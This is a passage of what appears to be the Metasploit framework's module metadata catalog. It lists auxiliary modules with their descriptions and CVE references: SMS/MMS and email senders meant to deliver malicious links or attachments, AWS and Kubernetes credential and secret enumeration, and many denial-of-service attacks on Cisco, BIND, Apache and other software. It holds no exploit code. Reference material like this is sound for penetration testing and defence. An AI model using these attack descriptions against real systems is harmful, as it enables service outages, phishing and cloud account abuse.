"This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/mms/send_mms.rb", - "is_install_path": true, - "ref_name": "client/mms/send_mms", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/sms/send_text": { - "name": "SMS Client", - "fullname": "auxiliary/client/sms/send_text", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sinn3r " - ], - "description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that you do not use this module to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/sms/send_text.rb", - "is_install_path": true, - "ref_name": "client/sms/send_text", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/smtp/emailer": { - "name": "Generic Emailer (SMTP)", - "fullname": "auxiliary/client/smtp/emailer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "et " - ], - 
"description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.", - "references": [ - "URL-http://spl0it.org/" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/smtp/emailer.rb", - "is_install_path": true, - "ref_name": "client/smtp/emailer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/telegram/send_message": { - "name": "Telegram Message Client", - "fullname": "auxiliary/client/telegram/send_message", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ege Balcı ", - "Gaurav Purswani" - ], - "description": "This module can be used to send a document and/or message to\n multiple chats on telegram. 
Please refer to the module\n documentation for info on how to retrieve the bot token and corresponding chat\n ID values.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:04:17 +0000", - "path": "/modules/auxiliary/client/telegram/send_message.rb", - "is_install_path": true, - "ref_name": "client/telegram/send_message", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_ec2": { - "name": "Amazon Web Services EC2 instance enumeration", - "fullname": "auxiliary/cloud/aws/enum_ec2", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Aaron Soto ", - "RageLtMan " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all EC2 instances associated\n with the account", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-06 22:49:03 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_ec2.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_ec2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_iam": { - "name": "Amazon Web Services IAM credential enumeration", - "fullname": "auxiliary/cloud/aws/enum_iam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Aaron Soto " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all IAM 
credentials associated\n with the account", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-06 22:49:03 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_iam.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_iam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_s3": { - "name": "Amazon Web Services S3 instance enumeration", - "fullname": "auxiliary/cloud/aws/enum_s3", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Aaron Soto " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all S3 buckets associated\n with the account", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-06 22:49:03 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_s3.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_s3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_ssm": { - "name": "Amazon Web Services EC2 SSM enumeration", - "fullname": "auxiliary/cloud/aws/enum_ssm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "RageLtMan " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all SSM-enabled EC2 instances\n 
accessible to the account. Once enumerated as SSM-enabled, the\n instances can be controlled using out-of-band WebSocket sessions\n provided by the AWS API (nominally, privileged out of the box).\n This module provides not only the API enumeration identifying EC2\n instances accessible via SSM with given credentials, but enables\n session initiation for all identified targets (without requiring\n target-level credentials) using the CreateSession datastore option.\n The module also provides an EC2 ID filter and a limiting throttle\n to prevent session stampedes or expensive messes.", - "references": [ - "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-06-03 11:02:15 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_ssm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/kubernetes/enum_kubernetes": { - "name": "Kubernetes Enumeration", - "fullname": "auxiliary/cloud/kubernetes/enum_kubernetes", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "alanfoster", - "Spencer McIntyre" - ], - "description": "Enumerate a Kubernetes API to report useful resources such as available namespaces,\n pods, secrets, etc.\n\n Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": 
null, - "mod_time": "2021-10-07 12:35:53 +0000", - "path": "/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb", - "is_install_path": true, - "ref_name": "cloud/kubernetes/enum_kubernetes", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "all", - "description": "enumerate all resources" - }, - { - "name": "auth", - "description": "enumerate auth" - }, - { - "name": "namespace", - "description": "enumerate namespace" - }, - { - "name": "namespaces", - "description": "enumerate namespaces" - }, - { - "name": "pod", - "description": "enumerate pod" - }, - { - "name": "pods", - "description": "enumerate pods" - }, - { - "name": "secret", - "description": "enumerate secret" - }, - { - "name": "secrets", - "description": "enumerate secrets" - }, - { - "name": "version", - "description": "enumerate version" - } - ] - }, - "auxiliary_crawler/msfcrawler": { - "name": "Metasploit Web Crawler", - "fullname": "auxiliary/crawler/msfcrawler", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "et " - ], - "description": "This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-04-02 15:48:42 +0000", - "path": "/modules/auxiliary/crawler/msfcrawler.rb", - "is_install_path": true, - "ref_name": "crawler/msfcrawler", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/android/android_stock_browser_iframe": { - "name": "Android Stock Browser Iframe DOS", - "fullname": 
"auxiliary/dos/android/android_stock_browser_iframe", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-12-01", - "type": "auxiliary", - "author": [ - "Jean Pascal Pereira", - "Jonathan Waggoner" - ], - "description": "This module exploits a vulnerability in the native browser that comes with Android 4.0.3.\n If successful, the browser will crash after viewing the webpage.", - "references": [ - "PACKETSTORM-118539", - "CVE-2012-6301" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb", - "is_install_path": true, - "ref_name": "dos/android/android_stock_browser_iframe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/apple_ios/webkit_backdrop_filter_blur": { - "name": "iOS Safari Denial of Service with CSS", - "fullname": "auxiliary/dos/apple_ios/webkit_backdrop_filter_blur", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-09-15", - "type": "auxiliary", - "author": [ - "Sabri Haddouche" - ], - "description": "This module exploits a vulnerability in WebKit on Apple iOS.\n If successful, the device will restart after viewing the webpage.", - "references": [ - "URL-https://twitter.com/pwnsdx/status/1040944750973595649", - "URL-http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea", - "URL-https://nbulischeck.github.io/apple-safari-crash" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb", - "is_install_path": 
true, - "ref_name": "dos/apple_ios/webkit_backdrop_filter_blur", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/cisco_7937g_dos": { - "name": "Cisco 7937G Denial-of-Service Attack", - "fullname": "auxiliary/dos/cisco/cisco_7937g_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-02", - "type": "auxiliary", - "author": [ - "Cody Martin" - ], - "description": "This module exploits a bug in how the conference station \n\thandles incoming SSH connections that provide an incompatible \n\tkey exchange. By connecting with an incompatible key exchange, \n\tthe device becomes nonresponsive until it is manually power\n\tcycled.", - "references": [ - "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", - "CVE-2020-16138" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-08-21 13:13:33 +0000", - "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos.py", - "is_install_path": true, - "ref_name": "dos/cisco/cisco_7937g_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/cisco_7937g_dos_reboot": { - "name": "Cisco 7937G Denial-of-Service Reboot Attack", - "fullname": "auxiliary/dos/cisco/cisco_7937g_dos_reboot", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-02", - "type": "auxiliary", - "author": [ - "Cody Martin" - ], - "description": "This module exploits a bug in how the conference station handles \n\texecuting a ping via its web interface. 
By repeatedly executing \n\tthe ping function without clearing out the resulting output, \n\ta DoS is caused that will reset the device after a few minutes.", - "references": [ - "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", - "CVE-2020-16139" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-08-21 09:01:45 +0000", - "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py", - "is_install_path": true, - "ref_name": "dos/cisco/cisco_7937g_dos_reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/ios_http_percentpercent": { - "name": "Cisco IOS HTTP GET /%% Request Denial of Service", - "fullname": "auxiliary/dos/cisco/ios_http_percentpercent", - "aliases": [], - "rank": 300, - "disclosure_date": "2000-04-26", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. 
This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.", - "references": [ - "BID-1154", - "CVE-2000-0380", - "OSVDB-1302" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb", - "is_install_path": true, - "ref_name": "dos/cisco/ios_http_percentpercent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/ios_telnet_rocem": { - "name": "Cisco IOS Telnet Denial of Service", - "fullname": "auxiliary/dos/cisco/ios_telnet_rocem", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-17", - "type": "auxiliary", - "author": [ - "Artem Kondratenko" - ], - "description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. 
Tested against Cisco\n Catalyst 2960 and 3750.", - "references": [ - "BID-96960", - "CVE-2017-3881", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp", - "URL-https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution" - ], - "platform": "", - "arch": "", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb", - "is_install_path": true, - "ref_name": "dos/cisco/ios_telnet_rocem", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dhcp/isc_dhcpd_clientid": { - "name": "ISC DHCP Zero Length ClientID Denial of Service Module", - "fullname": "auxiliary/dos/dhcp/isc_dhcpd_clientid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sid", - "theLightCosine " - ], - "description": "This module performs a Denial of Service Attack against the ISC DHCP server,\n versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request\n message with a 0-length client_id option for an IP address on the appropriate range\n for the dhcp server. 
When ISC DHCP Server tries to hash this value it exits\n abnormally.", - "references": [ - "CVE-2010-2156", - "OSVDB-65246", - "EDB-14185" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-03-05 03:38:51 +0000", - "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb", - "is_install_path": true, - "ref_name": "dos/dhcp/isc_dhcpd_clientid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dns/bind_tkey": { - "name": "BIND TKEY Query Denial of Service", - "fullname": "auxiliary/dos/dns/bind_tkey", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-07-28", - "type": "auxiliary", - "author": [ - "Jonathan Foote", - "throwawayokejxqbbif", - "wvu " - ], - "description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. 
This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.", - "references": [ - "CVE-2015-5477", - "URL-http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/", - "URL-https://kb.isc.org/article/AA-01272" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/dns/bind_tkey.rb", - "is_install_path": true, - "ref_name": "dos/dns/bind_tkey", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dns/bind_tsig": { - "name": "BIND TSIG Query Denial of Service", - "fullname": "auxiliary/dos/dns/bind_tsig", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-09-27", - "type": "auxiliary", - "author": [ - "Martin Rocha", - "Ezequiel Tavella", - "Alejandro Parodi", - "Infobyte Research Team" - ], - "description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.", - "references": [ - "CVE-2016-2776", - "URL-http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/dns/bind_tsig.rb", - "is_install_path": true, - "ref_name": "dos/dns/bind_tsig", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dns/bind_tsig_badtime": { - "name": "BIND TSIG Badtime Query Denial of Service", - "fullname": "auxiliary/dos/dns/bind_tsig_badtime", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-05-19", - "type": "auxiliary", - "author": [ - "Tobias Klein", - "Shuto Imai" - ], - "description": "A logic error in code which checks TSIG validity can be used to\n trigger an assertion failure in tsig.c.", - "references": [ - "CVE-2020-8617", - "URL-https://gitlab.isc.org/isc-projects/bind9/-/issues/1703", - "URL-https://www.trapkit.de/advisories/TKADV2020-002.txt" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb", - "is_install_path": true, - "ref_name": "dos/dns/bind_tsig_badtime", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/freebsd/nfsd/nfsd_mount": { - "name": "FreeBSD Remote NFS RPC Request Denial of Service", - "fullname": "auxiliary/dos/freebsd/nfsd/nfsd_mount", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.", - "references": [ - "BID-16838", - "OSVDB-23511", - "CVE-2006-0900" - ], - "platform": "", - "arch": "", - "rport": 2049, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb", - "is_install_path": true, - "ref_name": "dos/freebsd/nfsd/nfsd_mount", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ftp/vsftpd_232": { - "name": "VSFTPD 2.3.2 Denial of Service", - "fullname": "auxiliary/dos/ftp/vsftpd_232", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-03", - "type": "auxiliary", - "author": [ - "Nick Cottrell (Rad10Logic) ", - "Anna Graterol ", - "Mana Mostaani ", - "Maksymilian Arciemowicz" - ], - "description": "This module triggers a Denial of Service condition in the VSFTPD server in\n versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.", - "references": [ - "BID-46617", - "CVE-2011-0762", - "EDB-16270" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2023-05-25 21:21:49 +0000", - "path": "/modules/auxiliary/dos/ftp/vsftpd_232.rb", - "is_install_path": true, - "ref_name": "dos/ftp/vsftpd_232", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/hp/data_protector_rds": { - "name": "HP Data Protector Manager RDS DOS", - "fullname": "auxiliary/dos/hp/data_protector_rds", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-08", - "type": "auxiliary", - "author": [ - "Roi Mallo ", - "sinn3r " - ], - "description": "This module causes a remote DOS on HP Data Protector's RDS service. 
By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().", - "references": [ - "CVE-2011-0514", - "OSVDB-70617", - "EDB-15940" - ], - "platform": "", - "arch": "", - "rport": 1530, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/hp/data_protector_rds.rb", - "is_install_path": true, - "ref_name": "dos/hp/data_protector_rds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/3com_superstack_switch": { - "name": "3Com SuperStack Switch Denial of Service", - "fullname": "auxiliary/dos/http/3com_superstack_switch", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-06-24", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. 
Reported to affect versions\n prior to v2.72.", - "references": [ - "OSVDB-7246", - "CVE-2004-2691", - "URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb", - "is_install_path": true, - "ref_name": "dos/http/3com_superstack_switch", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/apache_commons_fileupload_dos": { - "name": "Apache Commons FileUpload and Apache Tomcat DoS", - "fullname": "auxiliary/dos/http/apache_commons_fileupload_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-06", - "type": "auxiliary", - "author": [ - "Unknown", - "ribeirux" - ], - "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. 
Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.", - "references": [ - "CVE-2014-0050", - "URL-https://tomcat.apache.org/security-8.html", - "URL-https://tomcat.apache.org/security-7.html" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_commons_fileupload_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/apache_mod_isapi": { - "name": "Apache mod_isapi Dangling Pointer", - "fullname": "auxiliary/dos/http/apache_mod_isapi", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-05", - "type": "auxiliary", - "author": [ - "Brett Gervasoni", - "jduck " - ], - "description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. 
In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.", - "references": [ - "CVE-2010-0425", - "OSVDB-62674", - "BID-38494", - "URL-https://bz.apache.org/bugzilla/show_bug.cgi?id=48509", - "URL-https://web.archive.org/web/20100715032229/http://www.gossamer-threads.com/lists/apache/cvs/381537", - "URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002", - "EDB-11650" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_mod_isapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/apache_range_dos": { - "name": "Apache Range Header DoS (Apache Killer)", - "fullname": "auxiliary/dos/http/apache_range_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-19", - "type": "auxiliary", - "author": [ - "Kingcope", - "Masashi Fujiwara", - "Markus Neis " - ], - "description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\"", - "references": [ - "BID-49303", - "CVE-2011-3192", - "EDB-17696", - "OSVDB-74721" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - 
"autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/apache_range_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_range_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "CHECK", - "description": "Check if target is vulnerable" - }, - { - "name": "DOS", - "description": "Trigger Denial of Service against target" - } - ] - }, - "auxiliary_dos/http/apache_tomcat_transfer_encoding": { - "name": "Apache Tomcat Transfer-Encoding Information Disclosure and DoS", - "fullname": "auxiliary/dos/http/apache_tomcat_transfer_encoding", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-09", - "type": "auxiliary", - "author": [ - "Steve Jones", - "Hoagie ", - "Paulino Calderon " - ], - "description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"", - "references": [ - "CVE-2010-2227", - "OSVDB-66319", - "BID-41544" - ], - "platform": "", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_tomcat_transfer_encoding", - "check": false, - 